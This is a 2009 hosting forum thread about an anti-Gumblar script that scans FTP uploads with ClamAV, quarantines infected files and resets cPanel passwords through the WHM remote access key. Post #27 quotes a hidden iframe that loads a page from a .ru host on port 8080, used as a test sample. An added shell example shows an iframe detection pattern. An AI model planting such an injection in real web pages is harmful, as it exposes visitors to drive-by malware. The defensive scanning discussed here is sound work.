  1. #16
    Member
    Join Date
    Apr 2005
    Location
    Istanbul / Turkey
    Posts
    57

    Default

    Quote Originally Posted by isputra View Post
    Code:
    $GLOBALS["whmhash"]        ="511e....2c";                // whm remote access key for root user
    What does this mean?

    Can I install this script under the /usr folder, not the /root folder? I know that some configuration in ftp_clamscan.php has to be changed to /usr. But is there any downside to not using the root folder?
    This is the Remote Access Key. The script uses this key to access WHM and change the password of the attacked domain.

    You have to access WHM as root to get this key. Use this URL after logging in to WHM: http://www.yourserver.net:2086/scripts/setrhash

    or find the Set Remote Access Key link in the left menu...

  2. #17
    Member
    Join Date
    Jun 2003
    Location
    Bharat
    Posts
    230

    Default

    hidonet

    What your script is not doing is:

    does not log IP,
    does not block IP,
    does not change password.

    It would be good if you can fix that, below is the sample mail that I get after an attack happens:

    Warning !!!

    17.08.2009 12:26:52 Monday
    There is a GUMBLAR ATTACK on account

    Infected file : /home/vncind/public_html/support/templates/Bliss/images/index.php

    Infection : .ru:8080/ at line 50

    Action : File moved to : /karantina/clamav//index.php.20090817122652

    Password might be changed to : ibHpcgHVOk



    Ret : Array<passwd>
    <passwd>
    <rawout></rawout>
    <services></services>
    <status>0</status>
    <statusmsg>No account was specified.</statusmsg>
    </passwd>
    </passwd>

    <!-- Web Host Manager (c) cPanel, Inc. 2008 cPanel Inc. Unauthorized copying is prohibited. -->

    Process Killed :
    Vinayak Sharma
    Vinsar.Net - Quality WebHosting Services at Economical Price USA & UK Servers
    Book Your Domain with Confidence Reliable Domain Reseller Account

  3. #18
    Member
    Join Date
    Apr 2005
    Location
    Istanbul / Turkey
    Posts
    57

    Default

    does not log IP,

    If your FTP server does not log to /var/log/messages, the IP will not be discovered.

    does not block IP,

    If your FTP server does not log to /var/log/messages, the IP will not be discovered.

    does not change password.

    I think your ftp_clamscan.sh is old or the WHM Remote Access Key is wrong.

    Are you trying the latest files?

    If you can't solve it, I can help you... my MSN address is msndestek@oxio.net
    Last edited by hidonet; 08-17-2009 at 10:30 AM.

  4. #19
    Member
    Join Date
    Jun 2003
    Location
    Bharat
    Posts
    230

    Default

    Do you mean ftp_clamscan.sh and ftp_clamscan.php are two different files?

    I am using only ftp_clamscan.php that is provided by you at http://www.oxio.net/anti_gumblar/ftp_clamscan.phps

    I have followed the instructions at Anti-Gumblar Protection Documentation

    If the file ftp_clamscan.sh is a different file, where to get it from and where to read more about it?
    Vinayak Sharma

  5. #20
    Member
    Join Date
    Apr 2005
    Location
    Istanbul / Turkey
    Posts
    57

    Default

    Quote Originally Posted by Vinsar View Post
    Do you mean ftp_clamscan.sh and ftp_clamscan.php are two different files?

    I am using only ftp_clamscan.php that is provided by you at http://www.oxio.net/anti_gumblar/ftp_clamscan.phps

    I have followed the instructions at Anti-Gumblar Protection Documentation

    If the file ftp_clamscan.sh is a different file, where to get it from and where to read more about it?
    Yes, ftp_clamscan.sh and ftp_clamscan.php are different files. ftp_clamscan.sh passes the FTP values to ftp_clamscan.php. If you don't use the .sh file, the username will not be discovered...

    I will fix the documentation if there is a mistake, and I will use only the PHP file in the next release...
    Last edited by hidonet; 08-17-2009 at 01:48 PM.

  6. #21
    Member
    Join Date
    Jun 2003
    Location
    Bharat
    Posts
    230

    Default

    But as of now where is the file ftp_clamscan.sh, from where can we download this file?
    Vinayak Sharma

  7. #22
    Member
    Join Date
    Apr 2005
    Location
    Istanbul / Turkey
    Posts
    57

    Default

    You'll find all needed files in http://www.oxio.net/anti_gumblar/anti_gumblar.tar.gz...

    Note: the PHP file source on the site is just for information...

  8. #23
    Member
    Join Date
    Jun 2003
    Location
    Bharat
    Posts
    230

    Default

    There is only ftp_clamscan.php file in http://www.oxio.net/anti_gumblar/anti_gumblar.tar.gz no ftp_clamscan.sh, can you please include both the files in that tar file.
    Vinayak Sharma

  9. #24
    Member
    Join Date
    Aug 2006
    Posts
    21

    Exclamation

    Hi,

    I notice that the script will scan the overwritten file and move it to quarantine.

    E.g. public_html/index.php: if the attack overwrites index.php, the existing index.php will be removed and moved to the quarantine folder.

    Is there any way that we can avoid the overwrite and avoid removal of the existing index.php file?

    Probably scanning during the upload, before the overwrite happens?

  10. #25
    Member
    Join Date
    Apr 2005
    Location
    Istanbul / Turkey
    Posts
    57

    Default

    Quote Originally Posted by smksa View Post
    Hi,

    I notice that the script will scan the overwritten file and move it to quarantine.

    E.g. public_html/index.php: if the attack overwrites index.php, the existing index.php will be removed and moved to the quarantine folder.

    Is there any way that we can avoid the overwrite and avoid removal of the existing index.php file?

    Probably scanning during the upload, before the overwrite happens?
    I want to scan before the overwrite, but this is not possible at this time.
    I've contacted the author of PureFTPd and asked him. He has not replied to me yet.

  11. #26
    Member
    Join Date
    Apr 2005
    Location
    Istanbul / Turkey
    Posts
    57

    Default

    Quote Originally Posted by Vinsar View Post
    There is only ftp_clamscan.php file in http://www.oxio.net/anti_gumblar/anti_gumblar.tar.gz no ftp_clamscan.sh, can you please include both the files in that tar file.
    Sorry for that. Please download and try again...

  12. #27
    Member isputra's Avatar
    Join Date
    May 2003
    Location
    Mbelitar
    Posts
    593

    Default

    It's not working. After installing this script as described in the manual and restarting FTP, I tried to upload a file with this code in it:

    PHP Code:
    <iframe src="http://39q.ru:8080/index.php" width=124 height=163 style="visibility: hidden"></iframe>
    The file, which I called if-rame.html, still gets through the FTP process and resides on the server without rejection by this script.

    So... how do I get this script working?
    It's me ...... It's me ......

  13. #28
    Member
    Join Date
    Apr 2005
    Location
    Istanbul / Turkey
    Posts
    57

    Default

    I'm going to update my script.

    These changes will be applied to the script very soon:

    1) .sh files will not be needed
    2) The user name will be extracted from the file path. This was a bug. Pure FTP is not returning the username and other arguments.
    3) I will try to extract a clean copy of the infected file from backup.
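
    The check discussed in posts #27 and #28, as an added example that is not part of hidonet's package: a post-upload hook body that flags an iframe pointing at a host on port 8080, takes the account name from the file path, and quarantines the file under a timestamped name like the one in the alert mail in post #17. All function names are hypothetical; it assumes cPanel's /home/<account>/ layout and lowercase alphanumeric account names, and example.invalid is a placeholder host.

```shell
#!/bin/sh
# Added example, not part of ftp_clamscan.php. Assumes cPanel's /home/<account>/ layout.

# Print the account that owns an uploaded path; return 1 if it cannot be trusted.
account_from_path() {
    case "$1" in
        */../*|*/./*) return 1 ;;      # refuse paths that were not normalised
        /home/*/*) ;;
        *) return 1 ;;
    esac
    acct=${1#/home/}
    acct=${acct%%/*}
    case "$acct" in
        ''|*[!a-z0-9]*) return 1 ;;    # assumed: lowercase alphanumeric usernames
    esac
    printf '%s\n' "$acct"
}

# Print "line:text" for every iframe whose src points at a host on port 8080.
# Exit status follows grep: 0 = match found, 1 = clean.
find_injected_iframes() {
    grep -niE '<iframe[^>]*src=["'\'']?https?://[a-z0-9.-]+:8080/' "$1"
}

# Move a flagged upload to "$2/<name>.<YYYYmmddHHMMSS>" and print the new path.
quarantine_upload() {
    dest="$2/$(basename "$1").$(date +%Y%m%d%H%M%S)"
    mkdir -p "$2" && mv -- "$1" "$dest" && printf '%s\n' "$dest"
}

# Hook body: $1 = uploaded file, $2 = quarantine directory.
# Prints "account line quarantined-path" and returns 0 when the file was flagged.
check_upload() {
    hits=$(find_injected_iframes "$1") || return 1
    line=${hits%%:*}                   # line number of the first match
    acct=$(account_from_path "$1") || acct=unknown
    moved=$(quarantine_upload "$1" "$2") || return 2
    printf '%s %s %s\n' "$acct" "$line" "$moved"
}

# Demo on a constructed sample; run the script with the argument "demo".
demo() {
    d=$(mktemp -d) && mkdir -p "$d/home/demo/public_html"
    f="$d/home/demo/public_html/index.html"
    printf '<html>\n<body>\n<iframe src="http://example.invalid:8080/index.php" style="visibility: hidden"></iframe>\n' > "$f"
    check_upload "$f" "$d/quarantine"
    rm -rf "$d"
}
if [ "${1:-}" = demo ]; then demo; fi
```

    Because the hook runs after the transfer completes, the upload has already replaced any existing file of the same name, which is the limitation raised in post #24.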

  14. #29
    Member
    Join Date
    Aug 2006
    Posts
    21

    Question

    Has the PureFTPd author responded to your question regarding scanning while uploading?

    I think this will be a better solution.

  15. #30
    Member
    Join Date
    Apr 2005
    Location
    Istanbul / Turkey
    Posts
    57

    Default

    Quote Originally Posted by smksa View Post
    Has the PureFTPd author responded to your question regarding scanning while uploading?

    I think this will be a better solution.
    No response from the author.
